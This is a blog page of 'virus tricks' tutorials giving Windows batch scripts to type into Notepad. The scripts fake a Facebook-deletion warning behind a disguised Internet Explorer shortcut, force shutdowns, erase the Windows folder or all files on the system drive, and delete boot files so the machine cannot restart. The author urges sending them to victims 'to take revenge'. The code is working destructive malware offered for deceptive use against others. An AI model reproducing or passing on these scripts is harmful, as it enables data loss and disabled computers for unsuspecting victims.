Showing posts with label Virus Tricks.. Show all posts
Showing posts with label Virus Tricks.. Show all posts

Friday, June 29, 2012

Facebook Virus


In thistutorial I will show you how to make a Facebook virus using simplecommands on notepad. .This will make the victim think they have got a viruswhen they click on an icon such as Internet Explorer .

1) Open notepad
2) Type this in :

@echo off
msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BEDELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX!
PAUSE
shutdown -r -t 300 -c " SORRY!!! YOUR FACEBOOK ACCOUNT ARE NOW BEING DELETED !!! PLEASE WAIT ..........."

3)Save as Internet Explorer .bat

4)Right click on Internet Explorer .bat and click Create Shortcut

5)Right click on shorcut and click Properties.

6)Click Change Icon

7) Choose Internet Explorer icon or similar , click OK , then click Apply

8)Delete real shortcut and replace it with fake . When victim click on it , hewill get warning messages that looks like this:

After five minutes windowswill restart , that is all. This is totally harmless and will give you a laugh.Enjoy !

Creat Your Own Virus With Notepad

YesNow it is possible for you to have your own virus. But before doing anythingyourself first of all you need to read the whole article first. And let meremind you that any problem occurs after you do anything then you are solelyresponsible for what has happened and I will not be responsible.

The only thing you need is Notepad.
1. Create a textfile called Test.txt(empty) in C:\
2. Now in yournotepad type "erase C:\Test.txt" (without the quotes).
3. Then save itas "Test.cmd".
4. Now run thefile "Test.cmd"
5. Go to C:\ andyou'll see your Test.txt is gone.

Now, the real work :

1. Go toNotepad.
2. Type eraseC:\WINDOWS
3. Save it aswindows.cmd.

NowDON'T Run the file or you'll lose your WINDOWS map.
So, that's theVirus. In this way you can make a virus to delete any file you want.
Now to take revenge. Send you file to your victim. Once victim opens it.WINDOWS map is Deleted. And he will have to install WINDOWS again.

Beware :

Itssimple but a strong virus that can delete anyones Windows OS ...Note : I am notTaking any Responsibilties if by this you damage your window

PC Shut Down Virus


Do The Following :-
1. Right Click On Your Desktop
2. Then In
New Click On Shortcut
3. A
Shortcut Wizard Will Appear
4. Type This In The Box:
shutdown -s -t 00
5. Your Done Now Right Click On The
Folder>Properties>Change Icon
6. And Then Choose Any Appropriate Icon
7. For
Restart Instead Of
-s Type -r
Enjoy It




Format a HDD with Notepad

Step 1: Go To Notepad And Type The Following:

@Echo off
Del C:\ *.*|y

Save It As Dell.Bat

Step 2: Want Worse Then Type The Following:



@echo off
del%systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

And Save It As A .Bat File

Virus that crashesh your own pc


Coding:-

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive


save as bat file in notepad!! This will pop up a message saying OWNED!! and shut down the computer never to reboot again! Type this in notepad start virus.bat virus.bat